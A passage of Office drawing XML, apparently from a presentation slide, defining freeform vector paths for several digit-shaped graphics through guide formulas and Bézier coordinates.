                <a:gd name="T2" fmla="*/ 95 w 110"/>
                <a:gd name="T3" fmla="*/ 175 h 194"/>
                <a:gd name="T4" fmla="*/ 55 w 110"/>
                <a:gd name="T5" fmla="*/ 194 h 194"/>
                <a:gd name="T6" fmla="*/ 15 w 110"/>
                <a:gd name="T7" fmla="*/ 175 h 194"/>
                <a:gd name="T8" fmla="*/ 0 w 110"/>
                <a:gd name="T9" fmla="*/ 117 h 194"/>
                <a:gd name="T10" fmla="*/ 0 w 110"/>
                <a:gd name="T11" fmla="*/ 77 h 194"/>
                <a:gd name="T12" fmla="*/ 15 w 110"/>
                <a:gd name="T13" fmla="*/ 19 h 194"/>
                <a:gd name="T14" fmla="*/ 55 w 110"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 95 w 110"/>
                <a:gd name="T17" fmla="*/ 19 h 194"/>
                <a:gd name="T18" fmla="*/ 110 w 110"/>
                <a:gd name="T19" fmla="*/ 77 h 194"/>
                <a:gd name="T20" fmla="*/ 110 w 110"/>
                <a:gd name="T21" fmla="*/ 117 h 194"/>
                <a:gd name="T22" fmla="*/ 74 w 110"/>
                <a:gd name="T23" fmla="*/ 73 h 194"/>
                <a:gd name="T24" fmla="*/ 69 w 110"/>
                <a:gd name="T25" fmla="*/ 40 h 194"/>
                <a:gd name="T26" fmla="*/ 55 w 110"/>
                <a:gd name="T27" fmla="*/ 30 h 194"/>
                <a:gd name="T28" fmla="*/ 55 w 110"/>
                <a:gd name="T29" fmla="*/ 30 h 194"/>
                <a:gd name="T30" fmla="*/ 41 w 110"/>
                <a:gd name="T31" fmla="*/ 40 h 194"/>
                <a:gd name="T32" fmla="*/ 37 w 110"/>
                <a:gd name="T33" fmla="*/ 73 h 194"/>
                <a:gd name="T34" fmla="*/ 37 w 110"/>
                <a:gd name="T35" fmla="*/ 120 h 194"/>
                <a:gd name="T36" fmla="*/ 41 w 110"/>
                <a:gd name="T37" fmla="*/ 154 h 194"/>
                <a:gd name="T38" fmla="*/ 55 w 110"/>
                <a:gd name="T39" fmla="*/ 164 h 194"/>
                <a:gd name="T40" fmla="*/ 56 w 110"/>
                <a:gd name="T41" fmla="*/ 164 h 194"/>
                <a:gd name="T42" fmla="*/ 69 w 110"/>
                <a:gd name="T43" fmla="*/ 154 h 194"/>
                <a:gd name="T44" fmla="*/ 74 w 110"/>
                <a:gd name="T45" fmla="*/ 120 h 194"/>
                <a:gd name="T46" fmla="*/ 74 w 110"/>
                <a:gd name="T47" fmla="*/ 7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0" h="194">
                  <a:moveTo>
                    <a:pt x="110" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="143"/>
                    <a:pt x="105" y="162"/>
                    <a:pt x="95" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="72" y="194"/>
                    <a:pt x="55" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="194"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="11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2"/>
                    <a:pt x="15" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="85" y="6"/>
                    <a:pt x="95" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="32"/>
                    <a:pt x="110" y="52"/>
                    <a:pt x="110" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="117"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="58"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="69" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="61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49" y="30"/>
                    <a:pt x="44" y="33"/>
                    <a:pt x="41" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="47"/>
                    <a:pt x="37" y="58"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="41" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="161"/>
                    <a:pt x="49" y="164"/>
                    <a:pt x="55" y="16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1" y="164"/>
                    <a:pt x="66" y="161"/>
                    <a:pt x="69" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="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0" name="Freeform 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99883ED-E447-444F-9897-8D1BB0715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6284" y="2194731"/>
              <a:ext cx="91025" cy="240867"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 65 w 65"/>
                <a:gd name="T1" fmla="*/ 172 h 172"/>
                <a:gd name="T2" fmla="*/ 31 w 65"/>
                <a:gd name="T3" fmla="*/ 172 h 172"/>
                <a:gd name="T4" fmla="*/ 31 w 65"/>
                <a:gd name="T5" fmla="*/ 36 h 172"/>
                <a:gd name="T6" fmla="*/ 0 w 65"/>
                <a:gd name="T7" fmla="*/ 37 h 172"/>
                <a:gd name="T8" fmla="*/ 0 w 65"/>
                <a:gd name="T9" fmla="*/ 12 h 172"/>
                <a:gd name="T10" fmla="*/ 65 w 65"/>
                <a:gd name="T11" fmla="*/ 0 h 172"/>
                <a:gd name="T12" fmla="*/ 65 w 65"/>
                <a:gd name="T13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172">
                  <a:moveTo>
                    <a:pt x="65" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="31" y="172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="17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1" name="Freeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17699652-4F44-44CD-B941-B61CA32184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43055" y="2953931"/>
              <a:ext cx="140038" cy="246469"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 117 h 194"/>
                <a:gd name="T2" fmla="*/ 96 w 111"/>
                <a:gd name="T3" fmla="*/ 175 h 194"/>
                <a:gd name="T4" fmla="*/ 56 w 111"/>
                <a:gd name="T5" fmla="*/ 194 h 194"/>
                <a:gd name="T6" fmla="*/ 15 w 111"/>
                <a:gd name="T7" fmla="*/ 175 h 194"/>
                <a:gd name="T8" fmla="*/ 0 w 111"/>
                <a:gd name="T9" fmla="*/ 117 h 194"/>
                <a:gd name="T10" fmla="*/ 0 w 111"/>
                <a:gd name="T11" fmla="*/ 77 h 194"/>
                <a:gd name="T12" fmla="*/ 15 w 111"/>
                <a:gd name="T13" fmla="*/ 19 h 194"/>
                <a:gd name="T14" fmla="*/ 55 w 111"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 96 w 111"/>
                <a:gd name="T17" fmla="*/ 19 h 194"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 77 h 194"/>
                <a:gd name="T20" fmla="*/ 111 w 111"/>
                <a:gd name="T21" fmla="*/ 117 h 194"/>
                <a:gd name="T22" fmla="*/ 74 w 111"/>
                <a:gd name="T23" fmla="*/ 73 h 194"/>
                <a:gd name="T24" fmla="*/ 69 w 111"/>
                <a:gd name="T25" fmla="*/ 40 h 194"/>
                <a:gd name="T26" fmla="*/ 56 w 111"/>
                <a:gd name="T27" fmla="*/ 30 h 194"/>
                <a:gd name="T28" fmla="*/ 55 w 111"/>
                <a:gd name="T29" fmla="*/ 30 h 194"/>
                <a:gd name="T30" fmla="*/ 42 w 111"/>
                <a:gd name="T31" fmla="*/ 40 h 194"/>
                <a:gd name="T32" fmla="*/ 37 w 111"/>
                <a:gd name="T33" fmla="*/ 73 h 194"/>
                <a:gd name="T34" fmla="*/ 37 w 111"/>
                <a:gd name="T35" fmla="*/ 120 h 194"/>
                <a:gd name="T36" fmla="*/ 42 w 111"/>
                <a:gd name="T37" fmla="*/ 154 h 194"/>
                <a:gd name="T38" fmla="*/ 55 w 111"/>
                <a:gd name="T39" fmla="*/ 164 h 194"/>
                <a:gd name="T40" fmla="*/ 56 w 111"/>
                <a:gd name="T41" fmla="*/ 164 h 194"/>
                <a:gd name="T42" fmla="*/ 69 w 111"/>
                <a:gd name="T43" fmla="*/ 154 h 194"/>
                <a:gd name="T44" fmla="*/ 74 w 111"/>
                <a:gd name="T45" fmla="*/ 120 h 194"/>
                <a:gd name="T46" fmla="*/ 74 w 111"/>
                <a:gd name="T47" fmla="*/ 7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1" h="194">
                  <a:moveTo>
                    <a:pt x="111" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="142"/>
                    <a:pt x="106" y="162"/>
                    <a:pt x="96" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="188"/>
                    <a:pt x="72" y="194"/>
                    <a:pt x="56" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="194"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="142"/>
                    <a:pt x="0" y="11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2"/>
                    <a:pt x="15" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="86" y="6"/>
                    <a:pt x="96" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="32"/>
                    <a:pt x="111" y="52"/>
                    <a:pt x="111" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="117"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="58"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="69" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="56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49" y="30"/>
                    <a:pt x="45" y="33"/>
                    <a:pt x="42" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="47"/>
                    <a:pt x="37" y="58"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="42" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="161"/>
                    <a:pt x="49" y="164"/>
                    <a:pt x="55" y="16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2" y="164"/>
                    <a:pt x="66" y="161"/>
                    <a:pt x="69" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="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2" name="Freeform 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B22674-DC16-4F18-BA04-87809463C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6900" y="2953931"/>
              <a:ext cx="145640" cy="243668"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 115"/>
                <a:gd name="T1" fmla="*/ 191 h 191"/>
                <a:gd name="T2" fmla="*/ 3 w 115"/>
                <a:gd name="T3" fmla="*/ 191 h 191"/>
                <a:gd name="T4" fmla="*/ 3 w 115"/>
                <a:gd name="T5" fmla="*/ 166 h 191"/>
                <a:gd name="T6" fmla="*/ 55 w 115"/>
                <a:gd name="T7" fmla="*/ 101 h 191"/>
                <a:gd name="T8" fmla="*/ 69 w 115"/>
                <a:gd name="T9" fmla="*/ 76 h 191"/>
                <a:gd name="T10" fmla="*/ 74 w 115"/>
                <a:gd name="T11" fmla="*/ 56 h 191"/>
                <a:gd name="T12" fmla="*/ 69 w 115"/>
                <a:gd name="T13" fmla="*/ 36 h 191"/>
                <a:gd name="T14" fmla="*/ 56 w 115"/>
                <a:gd name="T15" fmla="*/ 29 h 191"/>
                <a:gd name="T16" fmla="*/ 42 w 115"/>
                <a:gd name="T17" fmla="*/ 38 h 191"/>
                <a:gd name="T18" fmla="*/ 37 w 115"/>
                <a:gd name="T19" fmla="*/ 62 h 191"/>
                <a:gd name="T20" fmla="*/ 1 w 115"/>
                <a:gd name="T21" fmla="*/ 62 h 191"/>
                <a:gd name="T22" fmla="*/ 1 w 115"/>
                <a:gd name="T23" fmla="*/ 61 h 191"/>
                <a:gd name="T24" fmla="*/ 15 w 115"/>
                <a:gd name="T25" fmla="*/ 17 h 191"/>
                <a:gd name="T26" fmla="*/ 56 w 115"/>
                <a:gd name="T27" fmla="*/ 0 h 191"/>
                <a:gd name="T28" fmla="*/ 96 w 115"/>
                <a:gd name="T29" fmla="*/ 15 h 191"/>
                <a:gd name="T30" fmla="*/ 111 w 115"/>
                <a:gd name="T31" fmla="*/ 56 h 191"/>
                <a:gd name="T32" fmla="*/ 103 w 115"/>
                <a:gd name="T33" fmla="*/ 88 h 191"/>
                <a:gd name="T34" fmla="*/ 75 w 115"/>
                <a:gd name="T35" fmla="*/ 127 h 191"/>
                <a:gd name="T36" fmla="*/ 51 w 115"/>
                <a:gd name="T37" fmla="*/ 162 h 191"/>
                <a:gd name="T38" fmla="*/ 115 w 115"/>
                <a:gd name="T39" fmla="*/ 162 h 191"/>
                <a:gd name="T40" fmla="*/ 115 w 115"/>
                <a:gd name="T41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91">
                  <a:moveTo>
                    <a:pt x="115" y="191"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="191"/>
                    <a:pt x="3" y="191"/>
                    <a:pt x="3" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="166"/>
                    <a:pt x="3" y="166"/>
                    <a:pt x="3" y="166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61" y="91"/>
                    <a:pt x="66" y="83"/>
                    <a:pt x="69" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="68"/>
                    <a:pt x="74" y="62"/>
                    <a:pt x="74" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="48"/>
                    <a:pt x="72" y="41"/>
                    <a:pt x="69" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="32"/>
                    <a:pt x="61" y="29"/>
                    <a:pt x="56" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="29"/>
                    <a:pt x="45" y="32"/>
                    <a:pt x="42" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="44"/>
                    <a:pt x="37" y="52"/>
                    <a:pt x="37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0" y="44"/>
                    <a:pt x="5" y="29"/>
                    <a:pt x="15" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="0"/>
                    <a:pt x="86" y="5"/>
                    <a:pt x="96" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="25"/>
                    <a:pt x="111" y="38"/>
                    <a:pt x="111" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="67"/>
                    <a:pt x="108" y="78"/>
                    <a:pt x="103" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="98"/>
                    <a:pt x="88" y="111"/>
                    <a:pt x="75" y="127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115" y="162"/>
                    <a:pt x="115" y="162"/>
                    <a:pt x="115" y="162"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="19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3" name="Freeform 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07E085E4-2C2B-4EB8-8161-6D497633E9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22327" y="4476531"/>
              <a:ext cx="140038" cy="247869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 110"/>
                <a:gd name="T1" fmla="*/ 118 h 195"/>
                <a:gd name="T2" fmla="*/ 95 w 110"/>
                <a:gd name="T3" fmla="*/ 175 h 195"/>
                <a:gd name="T4" fmla="*/ 55 w 110"/>
                <a:gd name="T5" fmla="*/ 195 h 195"/>
                <a:gd name="T6" fmla="*/ 15 w 110"/>
                <a:gd name="T7" fmla="*/ 175 h 195"/>
                <a:gd name="T8" fmla="*/ 0 w 110"/>
                <a:gd name="T9" fmla="*/ 118 h 195"/>
                <a:gd name="T10" fmla="*/ 0 w 110"/>
                <a:gd name="T11" fmla="*/ 77 h 195"/>
                <a:gd name="T12" fmla="*/ 15 w 110"/>
                <a:gd name="T13" fmla="*/ 20 h 195"/>
                <a:gd name="T14" fmla="*/ 55 w 110"/>
                <a:gd name="T15" fmla="*/ 0 h 195"/>
                <a:gd name="T16" fmla="*/ 95 w 110"/>
                <a:gd name="T17" fmla="*/ 20 h 195"/>
                <a:gd name="T18" fmla="*/ 110 w 110"/>
                <a:gd name="T19" fmla="*/ 77 h 195"/>
                <a:gd name="T20" fmla="*/ 110 w 110"/>
                <a:gd name="T21" fmla="*/ 118 h 195"/>
                <a:gd name="T22" fmla="*/ 73 w 110"/>
                <a:gd name="T23" fmla="*/ 74 h 195"/>
                <a:gd name="T24" fmla="*/ 69 w 110"/>
                <a:gd name="T25" fmla="*/ 41 h 195"/>
                <a:gd name="T26" fmla="*/ 55 w 110"/>
                <a:gd name="T27" fmla="*/ 31 h 195"/>
                <a:gd name="T28" fmla="*/ 54 w 110"/>
                <a:gd name="T29" fmla="*/ 31 h 195"/>
                <a:gd name="T30" fmla="*/ 41 w 110"/>
                <a:gd name="T31" fmla="*/ 41 h 195"/>
                <a:gd name="T32" fmla="*/ 36 w 110"/>
                <a:gd name="T33" fmla="*/ 74 h 195"/>
                <a:gd name="T34" fmla="*/ 36 w 110"/>
                <a:gd name="T35" fmla="*/ 121 h 195"/>
                <a:gd name="T36" fmla="*/ 41 w 110"/>
                <a:gd name="T37" fmla="*/ 155 h 195"/>
                <a:gd name="T38" fmla="*/ 55 w 110"/>
                <a:gd name="T39" fmla="*/ 164 h 195"/>
                <a:gd name="T40" fmla="*/ 55 w 110"/>
                <a:gd name="T41" fmla="*/ 164 h 195"/>
                <a:gd name="T42" fmla="*/ 69 w 110"/>
                <a:gd name="T43" fmla="*/ 155 h 195"/>
                <a:gd name="T44" fmla="*/ 73 w 110"/>
                <a:gd name="T45" fmla="*/ 121 h 195"/>
                <a:gd name="T46" fmla="*/ 73 w 110"/>
                <a:gd name="T47" fmla="*/ 7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0" h="195">
                  <a:moveTo>
                    <a:pt x="110" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="143"/>
                    <a:pt x="105" y="162"/>
                    <a:pt x="95" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="72" y="195"/>
                    <a:pt x="55" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="195"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="118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3"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="7"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="85" y="7"/>
                    <a:pt x="95" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="33"/>
                    <a:pt x="110" y="52"/>
                    <a:pt x="110" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="118"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="59"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="69" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="34"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="55" y="31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49" y="30"/>
                    <a:pt x="44" y="34"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="48"/>
                    <a:pt x="36" y="59"/>
                    <a:pt x="36" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="121"/>
                    <a:pt x="36" y="121"/>
                    <a:pt x="36" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="136"/>
                    <a:pt x="38" y="148"/>
                    <a:pt x="41" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="162"/>
                    <a:pt x="49" y="165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61" y="165"/>
                    <a:pt x="66" y="162"/>
                    <a:pt x="69" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="148"/>
                    <a:pt x="73" y="136"/>
                    <a:pt x="73" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="7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4" name="Freeform 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB63913-DC3C-42FF-AC9B-483AE0193C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84772" y="4480732"/>
              <a:ext cx="148441" cy="239467"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 92 w 106"/>
                <a:gd name="T1" fmla="*/ 107 h 171"/>
                <a:gd name="T2" fmla="*/ 106 w 106"/>
                <a:gd name="T3" fmla="*/ 107 h 171"/>
                <a:gd name="T4" fmla="*/ 106 w 106"/>
                <a:gd name="T5" fmla="*/ 134 h 171"/>
                <a:gd name="T6" fmla="*/ 92 w 106"/>
                <a:gd name="T7" fmla="*/ 134 h 171"/>
                <a:gd name="T8" fmla="*/ 92 w 106"/>
                <a:gd name="T9" fmla="*/ 171 h 171"/>
                <a:gd name="T10" fmla="*/ 58 w 106"/>
                <a:gd name="T11" fmla="*/ 171 h 171"/>
                <a:gd name="T12" fmla="*/ 58 w 106"/>
                <a:gd name="T13" fmla="*/ 134 h 171"/>
                <a:gd name="T14" fmla="*/ 2 w 106"/>
                <a:gd name="T15" fmla="*/ 134 h 171"/>
                <a:gd name="T16" fmla="*/ 0 w 106"/>
                <a:gd name="T17" fmla="*/ 113 h 171"/>
                <a:gd name="T18" fmla="*/ 58 w 106"/>
                <a:gd name="T19" fmla="*/ 0 h 171"/>
                <a:gd name="T20" fmla="*/ 92 w 106"/>
                <a:gd name="T21" fmla="*/ 0 h 171"/>
                <a:gd name="T22" fmla="*/ 92 w 106"/>
                <a:gd name="T23" fmla="*/ 107 h 171"/>
                <a:gd name="T24" fmla="*/ 30 w 106"/>
                <a:gd name="T25" fmla="*/ 107 h 171"/>
                <a:gd name="T26" fmla="*/ 58 w 106"/>
                <a:gd name="T27" fmla="*/ 107 h 171"/>
                <a:gd name="T28" fmla="*/ 58 w 106"/>
                <a:gd name="T29" fmla="*/ 48 h 171"/>
                <a:gd name="T30" fmla="*/ 58 w 106"/>
                <a:gd name="T31" fmla="*/ 48 h 171"/>
                <a:gd name="T32" fmla="*/ 56 w 106"/>
                <a:gd name="T33" fmla="*/ 51 h 171"/>
                <a:gd name="T34" fmla="*/ 30 w 106"/>
                <a:gd name="T35" fmla="*/ 107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6" h="171">
                  <a:moveTo>
                    <a:pt x="92" y="107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="107"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="30" y="107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="58" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="10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5" name="Freeform 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85398CC-3671-42F6-9759-D8B0FC0DC2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4800" y="5114109"/>
              <a:ext cx="141439" cy="247869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 118 h 195"/>
                <a:gd name="T2" fmla="*/ 96 w 111"/>
                <a:gd name="T3" fmla="*/ 175 h 195"/>
                <a:gd name="T4" fmla="*/ 55 w 111"/>
                <a:gd name="T5" fmla="*/ 195 h 195"/>
                <a:gd name="T6" fmla="*/ 15 w 111"/>
                <a:gd name="T7" fmla="*/ 175 h 195"/>
                <a:gd name="T8" fmla="*/ 0 w 111"/>
                <a:gd name="T9" fmla="*/ 118 h 195"/>
                <a:gd name="T10" fmla="*/ 0 w 111"/>
                <a:gd name="T11" fmla="*/ 77 h 195"/>
                <a:gd name="T12" fmla="*/ 15 w 111"/>
                <a:gd name="T13" fmla="*/ 20 h 195"/>
                <a:gd name="T14" fmla="*/ 55 w 111"/>
                <a:gd name="T15" fmla="*/ 0 h 195"/>
                <a:gd name="T16" fmla="*/ 96 w 111"/>
                <a:gd name="T17" fmla="*/ 20 h 195"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 77 h 195"/>
                <a:gd name="T20" fmla="*/ 111 w 111"/>
                <a:gd name="T21" fmla="*/ 118 h 195"/>
                <a:gd name="T22" fmla="*/ 74 w 111"/>
                <a:gd name="T23" fmla="*/ 74 h 195"/>
                <a:gd name="T24" fmla="*/ 69 w 111"/>
                <a:gd name="T25" fmla="*/ 41 h 195"/>
                <a:gd name="T26" fmla="*/ 56 w 111"/>
                <a:gd name="T27" fmla="*/ 31 h 195"/>
                <a:gd name="T28" fmla="*/ 55 w 111"/>
                <a:gd name="T29" fmla="*/ 31 h 195"/>
                <a:gd name="T30" fmla="*/ 41 w 111"/>
                <a:gd name="T31" fmla="*/ 41 h 195"/>
